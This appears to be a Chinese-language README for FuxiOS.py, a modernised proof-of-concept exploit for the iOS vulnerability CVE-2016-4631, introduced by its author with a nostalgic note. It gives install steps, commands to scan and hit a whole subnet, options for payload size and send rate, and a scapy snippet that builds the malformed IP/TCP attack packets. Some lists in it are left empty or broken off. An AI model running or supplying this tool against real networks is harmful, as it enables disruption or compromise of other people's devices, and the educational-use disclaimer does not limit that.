
🎯 FuxiOS.py v2.0 - CVE-2016-4631 Exploit PoC modernizado
为什么我现在发布这个?
在整理旧硬盘和被遗忘的代码仓库时,我发现了这个脚本——那是多年前我刚踏入网络安全行业时编写的。那是一个不同的时代:Python 2.7 占据主流,像 CVE-2016-4631 这样的漏洞层出不穷,每个能运行的 PoC 都像是一次小小的胜利。
时隔多年再次看到这段代码,我不禁感到怀旧。我回忆起那些调试漏洞的夜晚,看到"Payload sent successfully"时的激动,以及每个脚本如何成为我学习之路上的一个脚印。虽然如今我从事着更先进的技术工作,但这个小小的脚本代表了我步入攻防安全世界的第一步。
我决定将它现代化并上传,不仅仅是因为怀旧,更因为它可能对正在开始网络安全之旅的人们有所帮助。这是一个提醒:每个人都从某个地方起步,那些最初"简单"的脚本正是后续一切的基石。
F0LloW_Th3_R4ts 是我当时的签名……有些代码永远不会被遗忘。🐀
- BONKERS, 2025年7月
FuxIOS.py 是针对 CVE-2016-4631 漏洞的更新版概念验证 (PoC),该漏洞影响 iOS 设备。此版本已完全重写并现代化为 Python 3,在功能、安全性和可用性方面有显著改进。
list_of_ips → list_ips# 安装 nmap(python-nmap 所需)
# Windows: 从 https://nmap.org/download.html 下载
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# 克隆仓库
git clone <repo-url>
cd FuxiOS
# 安装依赖
pip install -r requirements.txt
# 或手动安装:
pip install scapy python-nmap
# 基本使用
sudo python3 FuxIOS.py
# 自定义配置
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# 高级选项
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# 查看帮助
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: 攻击源 IP(默认:192.168.1.95)-n, --network: 目标子网(默认:192.168.1.0/24)-m, --max-payload: 载荷最大大小(默认:40)-d, --delay: 数据包发送间隔(秒,默认:0.2)--interactive: 交互模式(兼容性)# 恶意数据包
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
本工具应仅用于:
日志保存在 fuxios_exploit.log,内容包括:
错误:"No module named 'scapy'"
pip install scapy
错误:"No module named 'nmap'"
pip install python-nmap
# 并确保系统中已安装 nmap
错误:"Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# 以管理员身份运行 PowerShell/CMD
Windows:"WinPcap/Npcap not found"
本项目仅用于教育目的。作者不对工具的滥用行为负责。
记住: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"